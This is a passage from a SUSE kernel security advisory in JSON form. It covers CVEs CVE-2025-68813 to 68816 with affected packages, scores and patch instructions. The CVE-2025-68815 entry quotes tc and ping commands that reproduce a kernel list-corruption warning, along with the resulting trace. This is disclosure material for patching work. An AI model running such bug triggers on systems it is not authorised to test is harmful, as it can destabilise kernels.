"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-68814",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68814"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring: fix filename leak in __io_openat_prep()\n\n __io_openat_prep() allocates a struct filename using getname(). However,\nfor the condition of the file being installed in the fixed file table as\nwell as having O_CLOEXEC flag set, the function returns early. At that\npoint, the request doesn\u0027t have REQ_F_NEED_CLEANUP flag set. Due to this,\nthe memory for the newly allocated struct filename is not cleaned up,\ncausing a memory leak.\n\nFix this by setting the REQ_F_NEED_CLEANUP for the request just after the\nsuccessful getname() call, so that when the request is torn down, the\nfilename will be cleaned up, along with other resources needing cleanup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68814",
"url": "https://www.suse.com/security/cve/CVE-2025-68814"
},
{
"category": "external",
"summary": "SUSE Bug 1256651 for CVE-2025-68814",
"url": "https://bugzilla.suse.com/1256651"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68814"
},
{
"cve": "CVE-2025-68815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Remove drr class from the active list if it changes to strict\n\nWhenever a user issues an ets qdisc change command, transforming a\ndrr class into a strict one, the ets code isn\u0027t checking whether that\nclass was in the active list and removing it. This means that, if a\nuser changes a strict class (which was in the active list) back to a drr\none, that class will be added twice to the active list [1].\n\nDoing so with the following commands:\n\ntc qdisc add dev lo root handle 1: ets bands 2 strict 1\ntc qdisc add dev lo parent 1:2 handle 20: \\\n tbf rate 8bit burst 100b latency 1s\ntc filter add dev lo parent 1: basic classid 1:2\nping -c1 -W0.01 -s 56 127.0.0.1\ntc qdisc change dev lo root handle 1: ets bands 2 strict 2\ntc qdisc change dev lo root handle 1: ets bands 2 strict 1\nping -c1 -W0.01 -s 56 127.0.0.1\n\nWill trigger the following splat with list debug turned on:\n\n[ 59.279014][ T365] ------------[ cut here ]------------\n[ 59.279452][ T365] list_add double add: new=ffff88801d60e350, prev=ffff88801d60e350, next=ffff88801d60e2c0.\n[ 59.280153][ T365] WARNING: CPU: 3 PID: 365 at lib/list_debug.c:35 __list_add_valid_or_report+0x17f/0x220\n[ 59.280860][ T365] Modules linked in:\n[ 59.281165][ T365] CPU: 3 UID: 0 PID: 365 Comm: tc Not tainted 6.18.0-rc7-00105-g7e9f13163c13-dirty #239 PREEMPT(voluntary)\n[ 59.281977][ T365] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 59.282391][ T365] RIP: 0010:__list_add_valid_or_report+0x17f/0x220\n[ 59.282842][ T365] Code: 89 c6 e8 d4 b7 0d ff 90 0f 0b 90 90 31 c0 e9 31 ff ff ff 90 48 c7 c7 e0 a0 22 9f 48 89 f2 48 89 c1 4c 89 c6 e8 b2 b7 0d ff 90 \u003c0f\u003e 0b 90 90 31 c0 e9 0f ff ff ff 48 89 f7 48 89 44 24 10 4c 89 44\n...\n[ 59.288812][ T365] Call Trace:\n[ 59.289056][ T365] \u003cTASK\u003e\n[ 59.289224][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.289546][ T365] ets_qdisc_change+0xd2b/0x1e80\n[ 59.289891][ T365] ? __lock_acquire+0x7e7/0x1be0\n[ 59.290223][ T365] ? __pfx_ets_qdisc_change+0x10/0x10\n[ 59.290546][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.290898][ T365] ? __mutex_trylock_common+0xda/0x240\n[ 59.291228][ T365] ? __pfx___mutex_trylock_common+0x10/0x10\n[ 59.291655][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.291993][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.292313][ T365] ? trace_contention_end+0xc8/0x110\n[ 59.292656][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293022][ T365] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 59.293351][ T365] tc_modify_qdisc+0x63a/0x1cf0\n\nFix this by always checking and removing an ets class from the active list\nwhen changing it to strict.\n\n[1] https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/tree/net/sched/sch_ets.c?id=ce052b9402e461a9aded599f5b47e76bc727f7de#n663",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68815",
"url": "https://www.suse.com/security/cve/CVE-2025-68815"
},
{
"category": "external",
"summary": "SUSE Bug 1256680 for CVE-2025-68815",
"url": "https://bugzilla.suse.com/1256680"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
